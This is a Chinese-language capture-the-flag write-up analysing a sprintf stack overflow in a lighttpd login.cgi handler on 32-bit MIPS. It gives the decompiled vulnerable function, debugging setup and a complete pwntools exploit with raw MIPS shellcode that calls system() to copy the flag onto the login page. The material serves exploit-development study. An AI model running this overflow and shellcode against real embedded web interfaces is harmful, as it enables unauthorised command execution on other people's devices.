xhlj 2025 linkone

lighttpd login.cgi Goto_chidx功能 sprintf栈溢出

int __fastcall Goto_chidx(int a1)
{
  const char *v2; // $v0
  int v3; // $s2
  const char *v4; // $v0
  char *v5; // $s1
  char *v6; // $s0
  FILE *v8; // $s0
  char v9[128]; // [sp+20h] [-80h] BYREF

  v2 = web_get("wlanIdxNum", a1, 0);
  v3 = 0;
  v5 = strdup(v2);
  v4 = web_get("wlanUrl", a1, 0);
  v6 = strdup(v4);
  if ( v5 )
    v3 = atoi(v5);
  sprintf(v9, "%s?wlanidx=%d", v6, v3);
  if ( access("/tmp/web_log", 0) )
    return web_redirect(v9);
  v8 = fopen("/dev/console", "w+");
  if ( !v8 )
    return web_redirect(v9);
  fprintf(v8, "%s:%s:%d:%s\n", "login.c", "Goto_chidx", 544, v9);
  fclose(v8);
  return web_redirect(v9);
}

架构32位mipsel（小端） qemu system起环境，堆栈可执行、无canary、地址偏移不变，payload中不能有0x00 直接栈溢出跳栈shellcode，shellcode布置第一个参数$a0跳转libc中system函数，执行cat /flag >> /etc_ro/lighttpd/www/login.shtml;将flag写到登录页

调试

启动脚本加一个端口用来调试 -net user 用户模式网络 提供NAT网络环境 -net nic 创建一个虚拟网卡（NIC, Network Interface Card），为虚拟机提供网络接口 -net user,hostfwd=tcp::2222-:22 -net nic 将宿主机的 TCP 端口 2222 转发到虚拟机的 22（SSH）端口，宿主机可直接访问localhost:2222访问到虚拟机22端口

while true; do
    ./gdbserver :1337 --attach `pidof login.cgi`
done

exp

from pwn import*

context.log_level='debug'
# r = remote("127.0.0.1", 8888)
r = remote('139.155.126.78', 21727)

'''
li $a0,0x7fff6508
li $t9,0x77dc3d80
jalr $t9
addiu $a1, 0x1122
'''
buf = b'\xff\x7f\x04<\x08e\x844\xdcw\x19<\x80=97\t\xf8 \x03"\x11\xa5$'
print(hex(len(buf)))
sc = buf

cmd = b"cat /flag >> /etc_ro/lighttpd/www/login.shtml;"
payload = b"A"*0x80+b"BBBBCCCCDDDD"+p32(0x7fff64f0)+sc+cmd

_packet = f'''POST /cgi-bin/login.cgi HTTP/1.1\r
Host: 127.0.0.1:8888\r
Cache-Control: max-age=0\r
Origin: http://127.0.0.1:8888\r
Content-Type: application/x-www-form-urlencoded\r
Upgrade-Insecure-Requests: 1\r
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36\r
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7\r
Referer: http://127.0.0.1:8888/\r
Accept-Encoding: gzip, deflate\r
Accept-Language: en-CN,en;q=0.9,zh-CN;q=0.8,zh;q=0.7,en-GB;q=0.6,en-US;q=0.5\r
Connection: close\r
Content-Length: {len("page=Goto_chidx&wlanIdxNum=1&wlanUrl=")+len(payload)}\r
\r
page=Goto_chidx&wlanIdxNum=1&wlanUrl='''

_packet= _packet.encode()+payload+b"\r"

'''
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
     Start        End Perm     Size Offset File
  0x400000   0x409000 r-xp     9000      0 /root/cpio-root/etc_ro/lighttpd/www/cgi-bin/login.cgi
  0x448000   0x452000 rw-p     a000   8000 /root/cpio-root/etc_ro/lighttpd/www/cgi-bin/login.cgi
  0x452000   0x458000 rwxp     6000      0 [heap]
0x77d7c000 0x77dd8000 r-xp    5c000      0 /root/cpio-root/lib/libuClibc-0.9.28.so
0x77dd8000 0x77e17000 ---p    3f000      0 [anon_77dd8]
0x77e17000 0x77e18000 r--p     1000  5b000 /root/cpio-root/lib/libuClibc-0.9.28.so
0x77e18000 0x77e19000 rw-p     1000  5c000 /root/cpio-root/lib/libuClibc-0.9.28.so
0x77e19000 0x77e1e000 rw-p     5000      0 [anon_77e19]
0x77e1e000 0x77e2a000 r-xp     c000      0 /root/cpio-root/lib/libwebutil.so
0x77e2a000 0x77e69000 ---p    3f000      0 [anon_77e2a]
0x77e69000 0x77e74000 rw-p     b000   b000 /root/cpio-root/lib/libwebutil.so
0x77e74000 0x77fb1000 rw-p   13d000      0 [anon_77e74]
0x77fb1000 0x77fb7000 r-xp     6000      0 /root/cpio-root/lib/ld-uClibc-0.9.28.so
0x77ff5000 0x77ff6000 rw-p     1000      0 [anon_77ff5]
0x77ff6000 0x77ff7000 r--p     1000   5000 /root/cpio-root/lib/ld-uClibc-0.9.28.so
0x77ff7000 0x77ff8000 rw-p     1000   6000 /root/cpio-root/lib/ld-uClibc-0.9.28.so
0x7ffd6000 0x7fff7000 rwxp    21000      0 [stack]
0x7fff7000 0x7fff8000 r-xp     1000      0 [vdso]
'''

r.send(_packet)

r.interactive()